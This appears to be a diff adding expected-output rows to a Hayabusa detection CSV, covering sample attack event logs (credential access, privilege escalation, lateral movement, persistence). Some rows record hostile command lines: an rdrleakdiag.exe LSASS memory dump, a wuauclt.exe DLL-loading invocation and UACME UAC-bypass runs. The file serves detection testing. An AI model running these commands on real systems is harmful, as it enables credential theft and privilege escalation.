+2020-09-27 22:42:01.092 +09:00,MSEDGEWIN10,17,info,,Pipe Created,\svchost-MSEDGEWIN10-8116-stdin | Process: C:\Windows\svchost.exe | PID: 1120 | PGUID: 747F3D96-96A8-5F70-0000-0010C0F02D00,rules/hayabusa/sysmon/events/17_PipeCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_renamed_psexec_service_sysmon_17_18.evtx
+2020-09-27 22:42:01.093 +09:00,MSEDGEWIN10,17,info,,Pipe Created,\svchost-MSEDGEWIN10-8116-stdout | Process: C:\Windows\svchost.exe | PID: 1120 | PGUID: 747F3D96-96A8-5F70-0000-0010C0F02D00,rules/hayabusa/sysmon/events/17_PipeCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_renamed_psexec_service_sysmon_17_18.evtx
+2020-09-27 22:42:01.093 +09:00,MSEDGEWIN10,17,info,,Pipe Created,\svchost-MSEDGEWIN10-8116-stderr | Process: C:\Windows\svchost.exe | PID: 1120 | PGUID: 747F3D96-96A8-5F70-0000-0010C0F02D00,rules/hayabusa/sysmon/events/17_PipeCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_renamed_psexec_service_sysmon_17_18.evtx
+2020-09-27 22:42:01.182 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\svchost-MSEDGEWIN10-8116-stdin | Process: C:\Windows\system32\PsExec.exe | PID: 8116 | PGUID: 747F3D96-96A8-5F70-0000-001028E92D00,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_renamed_psexec_service_sysmon_17_18.evtx
+2020-09-27 22:42:01.182 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\svchost-MSEDGEWIN10-8116-stdout | Process: C:\Windows\system32\PsExec.exe | PID: 8116 | PGUID: 747F3D96-96A8-5F70-0000-001028E92D00,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_renamed_psexec_service_sysmon_17_18.evtx
+2020-09-27 22:42:01.182 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\svchost-MSEDGEWIN10-8116-stderr | Process: C:\Windows\system32\PsExec.exe | PID: 8116 | PGUID: 747F3D96-96A8-5F70-0000-001028E92D00,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_renamed_psexec_service_sysmon_17_18.evtx
+2020-09-27 22:42:15.033 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\lsass | Process: C:\Windows\system32\svchost.exe | PID: 1000 | PGUID: 747F3D96-96B6-5F70-0000-0010E5382E00,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_renamed_psexec_service_sysmon_17_18.evtx
+2020-09-27 22:42:15.525 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\wkssvc | Process: C:\Windows\system32\mmc.exe | PID: 6096 | PGUID: 747F3D96-8E29-5F70-0000-001049471000,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_renamed_psexec_service_sysmon_17_18.evtx
+2020-09-27 22:42:15.530 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\browser | Process: C:\Windows\system32\mmc.exe | PID: 6096 | PGUID: 747F3D96-8E29-5F70-0000-001049471000,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_renamed_psexec_service_sysmon_17_18.evtx
+2020-09-28 21:47:36.197 +09:00,DESKTOP-PIU87N6,1,info,,Process Created,"Cmd: rdrleakdiag.exe /p 668 /o C:\Users\wanwan\Desktop /fullmemdmp /snap | Process: C:\Windows\System32\rdrleakdiag.exe | User: DESKTOP-PIU87N6\wanwan | Parent Cmd: ""C:\WINDOWS\system32\cmd.exe"" | LID: 0x30b90 | PID: 3352 | PGUID: BC47D85C-DB68-5F71-0000-0010B237AB01",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_rdrleakdiag_lsass_dump.evtx
+2020-09-28 21:47:36.197 +09:00,DESKTOP-PIU87N6,1,high,Evas,RdrLeakDiag Process Dump,,rules/sigma/process_creation/proc_creation_win_proc_dump_rdrleakdiag.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_rdrleakdiag_lsass_dump.evtx
+2020-09-28 21:47:36.197 +09:00,DESKTOP-PIU87N6,1,high,CredAccess,Process Dump via RdrLeakDiag.exe,,rules/sigma/process_creation/proc_creation_win_process_dump_rdrleakdiag.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_rdrleakdiag_lsass_dump.evtx
+2020-09-28 21:47:36.206 +09:00,DESKTOP-PIU87N6,8,medium,,Process Injection,Src Process: C:\Windows\System32\rdrleakdiag.exe | Tgt Process: C:\Windows\System32\lsass.exe | Src PID: 3352 | Src PGUID: BC47D85C-DB68-5F71-0000-0010B237AB01 | Tgt PID: 668 | Tgt PGUID: BC47D85C-FAA9-5F68-0000-0010D9590000,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_rdrleakdiag_lsass_dump.evtx
+2020-09-28 21:47:36.215 +09:00,DESKTOP-PIU87N6,1,info,,Process Created,Cmd: C:\WINDOWS\system32\lsass.exe | Process: C:\Windows\System32\lsass.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\WINDOWS\system32\lsass.exe | LID: 0x3e7 | PID: 7468 | PGUID: BC47D85C-DB68-5F71-0000-00109138AB01,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_rdrleakdiag_lsass_dump.evtx
+2020-09-28 21:47:36.215 +09:00,DESKTOP-PIU87N6,1,critical,CredAccess,Suspicious LSASS Process Clone,,rules/sigma/process_creation/proc_creation_win_susp_lsass_clone.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_rdrleakdiag_lsass_dump.evtx
+2020-09-28 21:47:36.630 +09:00,DESKTOP-PIU87N6,11,info,,File Created,Path: C:\Users\wanwan\Desktop\minidump_668.dmp | Process: C:\WINDOWS\system32\rdrleakdiag.exe | PID: 3352 | PGUID: BC47D85C-DB68-5F71-0000-0010B237AB01,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_rdrleakdiag_lsass_dump.evtx
+2020-10-02 03:35:02.415 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: POC.exe | Process: C:\Users\Public\POC\bin\Debug\POC.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" | LID: 0x5a873 | PID: 4696 | PGUID: 747F3D96-2156-5F76-0000-0010DBE82500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/eop_appcontainer_il_broker_filewrite.evtx
+2020-10-02 03:35:02.415 +09:00,MSEDGEWIN10,1,high,,Suspicious Program Names,,rules/sigma/process_creation/proc_creation_win_susp_progname.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/eop_appcontainer_il_broker_filewrite.evtx
+2020-10-02 03:35:02.415 +09:00,MSEDGEWIN10,1,high,Evas,Execution from Suspicious Folder,,rules/sigma/process_creation/proc_creation_win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/eop_appcontainer_il_broker_filewrite.evtx
+2020-10-02 03:35:02.606 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: Program | Process: C:\Users\Public\POC\bin\Debug\POC.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: POC.exe | LID: 0x5a873 | PID: 5448 | PGUID: 747F3D96-2156-5F76-0000-00100EEC2500,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/eop_appcontainer_il_broker_filewrite.evtx
+2020-10-02 03:35:02.606 +09:00,MSEDGEWIN10,1,high,,Suspicious Program Names,,rules/sigma/process_creation/proc_creation_win_susp_progname.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/eop_appcontainer_il_broker_filewrite.evtx
+2020-10-02 03:35:02.606 +09:00,MSEDGEWIN10,1,high,Evas,Execution from Suspicious Folder,,rules/sigma/process_creation/proc_creation_win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/eop_appcontainer_il_broker_filewrite.evtx
+2020-10-02 03:35:02.775 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Microsoft\abc.txt | Process: C:\Windows\System32\RuntimeBroker.exe | PID: 6932 | PGUID: 747F3D96-1903-5F76-0000-0010B85E0900,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/eop_appcontainer_il_broker_filewrite.evtx
+2020-10-06 05:43:58.351 +09:00,LAPTOP-JU4M3I0E,10,low,,Process Access,Src Process: C:\Users\bouss\Downloads\UACME-3.2.6\Source\Akagi\output\x64\Debug\Akagi_64.exe | Tgt Process: C:\Windows\System32\cmd.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 27356 | Src PGUID: 00247C92-858E-5F7B-0000-00106B29202B | Tgt PID: 19072 | Tgt PGUID: 00247C92-82A5-5F7B-0000-0010C89F0A2B,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/UACME_59_Sysmon.evtx
+2020-10-06 05:43:58.351 +09:00,LAPTOP-JU4M3I0E,10,low,,Process Access,Src Process: C:\Users\bouss\Downloads\UACME-3.2.6\Source\Akagi\output\x64\Debug\Akagi_64.exe | Tgt Process: C:\Windows\System32\cmd.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 27356 | Src PGUID: 00247C92-858E-5F7B-0000-00106B29202B | Tgt PID: 19072 | Tgt PGUID: 00247C92-82A5-5F7B-0000-0010C89F0A2B,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/UACME_59_Sysmon.evtx
+2020-10-06 05:43:58.390 +09:00,LAPTOP-JU4M3I0E,10,low,,Process Access,Src Process: C:\windows\system32\svchost.exe | Tgt Process: C:\windows\explorer.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1014c0 | Src PID: 11640 | Src PGUID: 00247C92-5B27-5F74-0000-001045F11200 | Tgt PID: 27356 | Tgt PGUID: 00247C92-858E-5F7B-0000-00106B29202B,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/UACME_59_Sysmon.evtx
+2020-10-06 05:43:58.390 +09:00,LAPTOP-JU4M3I0E,10,low,,Process Access,Src Process: C:\windows\system32\svchost.exe | Tgt Process: C:\windows\explorer.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1014c0 | Src PID: 11640 | Src PGUID: 00247C92-5B27-5F74-0000-001045F11200 | Tgt PID: 27356 | Tgt PGUID: 00247C92-858E-5F7B-0000-00106B29202B,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/UACME_59_Sysmon.evtx
+2020-10-06 05:43:58.394 +09:00,LAPTOP-JU4M3I0E,10,low,,Process Access,Src Process: C:\windows\system32\svchost.exe | Tgt Process: C:\windows\explorer.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1014c0 | Src PID: 11640 | Src PGUID: 00247C92-5B27-5F74-0000-001045F11200 | Tgt PID: 27356 | Tgt PGUID: 00247C92-858E-5F7B-0000-00106B29202B,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/UACME_59_Sysmon.evtx
+2020-10-06 05:43:58.394 +09:00,LAPTOP-JU4M3I0E,10,low,,Process Access,Src Process: C:\windows\system32\svchost.exe | Tgt Process: C:\windows\explorer.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1014c0 | Src PID: 11640 | Src PGUID: 00247C92-5B27-5F74-0000-001045F11200 | Tgt PID: 27356 | Tgt PGUID: 00247C92-858E-5F7B-0000-00106B29202B,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/UACME_59_Sysmon.evtx
+2020-10-06 05:43:58.450 +09:00,LAPTOP-JU4M3I0E,1,info,,Process Created,Cmd: C:\windows\system32\taskmgr.exe | Process: C:\Windows\System32\Taskmgr.exe | User: LAPTOP-JU4M3I0E\bouss | Parent Cmd: Akagi_64.exe 59 cmd.exe | LID: 0x391e334 | PID: 18404 | PGUID: 00247C92-858E-5F7B-0000-00105241202B,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/UACME_59_Sysmon.evtx
+2020-10-06 05:43:58.450 +09:00,LAPTOP-JU4M3I0E,1,info,,Process Created,Cmd: C:\windows\system32\taskmgr.exe | Process: C:\Windows\System32\Taskmgr.exe | User: LAPTOP-JU4M3I0E\bouss | Parent Cmd: Akagi_64.exe 59 cmd.exe | LID: 0x391e334 | PID: 18404 | PGUID: 00247C92-858E-5F7B-0000-00105241202B,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/UACME_59_Sysmon.evtx
+2020-10-06 05:43:58.450 +09:00,LAPTOP-JU4M3I0E,10,low,,Process Access,Src Process: C:\windows\system32\svchost.exe | Tgt Process: C:\windows\system32\taskmgr.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 11640 | Src PGUID: 00247C92-5B27-5F74-0000-001045F11200 | Tgt PID: 18404 | Tgt PGUID: 00247C92-858E-5F7B-0000-00105241202B,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/UACME_59_Sysmon.evtx
+2020-10-06 05:43:58.450 +09:00,LAPTOP-JU4M3I0E,10,low,,Process Access,Src Process: C:\windows\system32\svchost.exe | Tgt Process: C:\windows\system32\taskmgr.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 11640 | Src PGUID: 00247C92-5B27-5F74-0000-001045F11200 | Tgt PID: 18404 | Tgt PGUID: 00247C92-858E-5F7B-0000-00105241202B,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/UACME_59_Sysmon.evtx
+2020-10-06 05:43:58.450 +09:00,LAPTOP-JU4M3I0E,10,low,,Process Access,Src Process: C:\windows\explorer.exe | Tgt Process: C:\windows\system32\taskmgr.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x12367b | Src PID: 27356 | Src PGUID: 00247C92-858E-5F7B-0000-00106B29202B | Tgt PID: 18404 | Tgt PGUID: 00247C92-858E-5F7B-0000-00105241202B,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/UACME_59_Sysmon.evtx
+2020-10-06 05:43:58.450 +09:00,LAPTOP-JU4M3I0E,10,low,,Process Access,Src Process: C:\windows\explorer.exe | Tgt Process: C:\windows\system32\taskmgr.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x12367b | Src PID: 27356 | Src PGUID: 00247C92-858E-5F7B-0000-00106B29202B | Tgt PID: 18404 | Tgt PGUID: 00247C92-858E-5F7B-0000-00105241202B,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/UACME_59_Sysmon.evtx
+2020-10-06 05:43:58.451 +09:00,LAPTOP-JU4M3I0E,1,info,,Process Created,Cmd: cmd.exe | Process: C:\Windows\System32\cmd.exe | User: LAPTOP-JU4M3I0E\bouss | Parent Cmd: C:\windows\system32\taskmgr.exe | LID: 0x391e334 | PID: 6636 | PGUID: 00247C92-858E-5F7B-0000-0010E741202B,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/UACME_59_Sysmon.evtx
+2020-10-06 05:43:58.451 +09:00,LAPTOP-JU4M3I0E,1,low,Evas,Taskmgr as Parent,,rules/sigma/process_creation/proc_creation_win_susp_taskmgr_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/UACME_59_Sysmon.evtx
+2020-10-06 05:43:58.451 +09:00,LAPTOP-JU4M3I0E,1,info,,Process Created,Cmd: cmd.exe | Process: C:\Windows\System32\cmd.exe | User: LAPTOP-JU4M3I0E\bouss | Parent Cmd: C:\windows\system32\taskmgr.exe | LID: 0x391e334 | PID: 6636 | PGUID: 00247C92-858E-5F7B-0000-0010E741202B,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/UACME_59_Sysmon.evtx
+2020-10-06 05:43:58.451 +09:00,LAPTOP-JU4M3I0E,1,low,Evas,Taskmgr as Parent,,rules/sigma/process_creation/proc_creation_win_susp_taskmgr_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/UACME_59_Sysmon.evtx
+2020-10-06 07:28:20.530 +09:00,LAPTOP-JU4M3I0E,1,info,,Process Created,"Cmd: ""C:\windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: LAPTOP-JU4M3I0E\bouss | Parent Cmd: ""C:\Windows\System32\mmc.exe"" WF.msc | LID: 0x391e334 | PID: 12876 | PGUID: 00247C92-9E04-5F7B-0000-0010CF98272C",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_63.evtx
+2020-10-06 07:28:20.530 +09:00,LAPTOP-JU4M3I0E,1,high,LatMov,MMC Spawning Windows Shell,,rules/sigma/process_creation/proc_creation_win_mmc_spawn_shell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_63.evtx
+2020-10-06 07:28:20.530 +09:00,LAPTOP-JU4M3I0E,10,low,,Process Access,Src Process: C:\Windows\System32\mmc.exe | Tgt Process: C:\windows\system32\cmd.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 20228 | Src PGUID: 00247C92-9E03-5F7B-0000-0010A645272C | Tgt PID: 12876 | Tgt PGUID: 00247C92-9E04-5F7B-0000-0010CF98272C,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_63.evtx
+2020-10-06 07:28:20.530 +09:00,LAPTOP-JU4M3I0E,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_63.evtx
+2020-10-07 06:40:30.910 +09:00,02694w-win10.threebeesco.com,7,medium,CredAccess,Unsigned Image Loaded Into LSASS Process,,rules/sigma/image_load/sysmon_unsigned_image_loaded_into_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ImageLoad_NFSH_Sysmon_7.evtx
+2020-10-07 06:40:42.943 +09:00,02694w-win10.threebeesco.com,7,medium,CredAccess,Unsigned Image Loaded Into LSASS Process,,rules/sigma/image_load/sysmon_unsigned_image_loaded_into_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ImageLoad_NFSH_Sysmon_7.evtx
+2020-10-07 07:11:17.572 +09:00,02694w-win10.threebeesco.com,18,info,,Pipe Connected,\winreg | Process: System | PID: 4 | PGUID: 6A3C3EF2-E683-5F7C-0000-0010EB030000,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_regsvc_DirectoryServiceExtPt_Lsass_NTDS_AdamXpn.evtx
+2020-10-07 07:11:17.814 +09:00,02694w-win10.threebeesco.com,13,high,Exec | Persis,DLL Load via LSASS,,rules/sigma/registry_event/sysmon_susp_lsass_dll_load.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_regsvc_DirectoryServiceExtPt_Lsass_NTDS_AdamXpn.evtx
+2020-10-07 07:11:17.848 +09:00,02694w-win10.threebeesco.com,12,high,Exec | Persis,DLL Load via LSASS,,rules/sigma/registry_event/sysmon_susp_lsass_dll_load.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_regsvc_DirectoryServiceExtPt_Lsass_NTDS_AdamXpn.evtx
+2020-10-07 07:11:18.680 +09:00,02694w-win10.threebeesco.com,3,info,,Network Connection,tcp | Src: 172.16.66.36:64037 (01566S-WIN16-IR) | Dst: 172.16.66.143:445 (02694w-win10.threebeesco.com) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 6A3C3EF2-E683-5F7C-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_regsvc_DirectoryServiceExtPt_Lsass_NTDS_AdamXpn.evtx
+2020-10-07 07:11:18.680 +09:00,02694w-win10.threebeesco.com,3,info,,Network Connection,tcp | Src: 172.16.66.143:49920 (02694w-win10.threebeesco.com) | Dst: 172.16.66.36:49670 (01566S-WIN16-IR) | User: NT AUTHORITY\SYSTEM | Process: C:\Windows\System32\lsass.exe | PID: 632 | PGUID: 6A3C3EF2-E698-5F7C-0000-00103C790000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_regsvc_DirectoryServiceExtPt_Lsass_NTDS_AdamXpn.evtx
+2020-10-07 07:11:18.930 +09:00,02694w-win10.threebeesco.com,3,info,,Network Connection,tcp | Src: 172.16.66.36:64038 (01566S-WIN16-IR) | Dst: 172.16.66.143:445 (02694w-win10.threebeesco.com) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 6A3C3EF2-E683-5F7C-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_regsvc_DirectoryServiceExtPt_Lsass_NTDS_AdamXpn.evtx
+2020-10-14 05:11:42.278 +09:00,LAPTOP-JU4M3I0E,1,info,,Process Created,Cmd: c:\windows\system32\cmd.exe | Process: C:\Windows\System32\cmd.exe | User: LAPTOP-JU4M3I0E\bouss | Parent Cmd: wuauclt.exe /UpdateDeploymentProvider C:\ProgramData\Intel\helpa.dll /RunHandlerComServer | LID: 0x6f859 | PID: 6372 | PGUID: 00247C92-09FE-5F86-0000-0010AC861401,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/evasion_execution_imageload_wuauclt_lolbas.evtx
+2020-10-14 05:11:42.279 +09:00,LAPTOP-JU4M3I0E,1,info,,Process Created,Cmd: c:\windows\system32\cmd.exe | Process: C:\Windows\System32\cmd.exe | User: LAPTOP-JU4M3I0E\bouss | Parent Cmd: wuauclt.exe /UpdateDeploymentProvider C:\ProgramData\Intel\helpa.dll /RunHandlerComServer | LID: 0x6f859 | PID: 7648 | PGUID: 00247C92-09FE-5F86-0000-0010AD861401,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/evasion_execution_imageload_wuauclt_lolbas.evtx
+2020-10-15 22:17:02.403 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\System32\smartscreen.exe -Embedding | Process: C:\Windows\System32\smartscreen.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ? | LID: 0x8d824 | PID: 2656 | PGUID: 747F3D96-4BCE-5F88-0000-00103F464D00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_injection_persistence_run_key.evtx
+2020-10-15 22:17:02.736 +09:00,MSEDGEWIN10,13,high,Persis,New RUN Key Pointing to Suspicious Folder,,rules/sigma/registry_event/sysmon_susp_run_key_img_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_injection_persistence_run_key.evtx
+2020-10-15 22:17:02.736 +09:00,MSEDGEWIN10,13,medium,Persis,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_injection_persistence_run_key.evtx
+2020-10-15 22:17:02.737 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Program Files (x86)\Internet Explorer\iexplore.exe"" | Process: C:\Program Files (x86)\Internet Explorer\iexplore.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Users\Public\tools\apt\tendyron.exe"" | LID: 0x8d824 | PID: 6392 | PGUID: 747F3D96-4BCE-5F88-0000-0010905B4D00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_injection_persistence_run_key.evtx
+2020-10-15 22:17:02.738 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Users\Public\tools\apt\tendyron.exe | Tgt Process: C:\Program Files (x86)\Internet Explorer\iexplore.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 2572 | Src PGUID: 747F3D96-4BCE-5F88-0000-001070544D00 | Tgt PID: 6392 | Tgt PGUID: 747F3D96-4BCE-5F88-0000-0010905B4D00,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_injection_persistence_run_key.evtx
+2020-10-15 22:17:02.764 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Users\Public\tools\apt\tendyron.exe | Tgt Process: C:\Program Files (x86)\Internet Explorer\iexplore.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1452 | Src PID: 2572 | Src PGUID: 747F3D96-4BCE-5F88-0000-001070544D00 | Tgt PID: 6392 | Tgt PGUID: 747F3D96-4BCE-5F88-0000-0010905B4D00,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_injection_persistence_run_key.evtx
+2020-10-15 22:17:02.765 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Users\Public\tools\apt\tendyron.exe | Tgt Process: C:\Program Files (x86)\Internet Explorer\iexplore.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1452 | Src PID: 2572 | Src PGUID: 747F3D96-4BCE-5F88-0000-001070544D00 | Tgt PID: 6392 | Tgt PGUID: 747F3D96-4BCE-5F88-0000-0010905B4D00,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_injection_persistence_run_key.evtx
+2020-10-17 20:38:58.613 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Font Download | URL: https://fs.microsoft.com/fs/windows/config.json,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-10-17 20:43:27.499 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Users\Public\tools\apt\wwlib\test.exe"" | Process: C:\Users\Public\tools\apt\wwlib\test.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0xa0a10 | PID: 3660 | PGUID: 747F3D96-D8DF-5F8A-0000-0010572F7200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx
